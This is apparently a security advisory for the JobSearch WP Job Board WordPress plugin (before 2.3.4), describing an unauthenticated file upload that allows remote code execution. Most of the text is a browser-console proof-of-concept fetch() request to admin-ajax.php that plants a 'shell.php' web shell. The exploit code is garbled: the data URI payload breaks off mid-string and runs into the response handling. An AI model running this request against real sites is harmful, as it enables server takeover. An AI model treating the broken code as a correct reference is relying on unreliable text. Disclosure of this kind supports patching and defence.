JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE

Description The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server

PoC

Navigate to the site, and paste the following in your browser’s console: fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: new URLSearchParams({ ‘action’: ‘jobsearch_facebook_get_soc_login_url’, ‘user_data’: JSON.stringify({ “given_name”: (Math.random()*0x1000).toFixed(), “family_name”: (Math.random()*0x1000).toFixed(), “picture”: "data:, response.text()) .then(data => console.log(data)) .catch(error => console.error(‘Error:’, error)); Notice a new file named “shell.php” was uploaded to the site.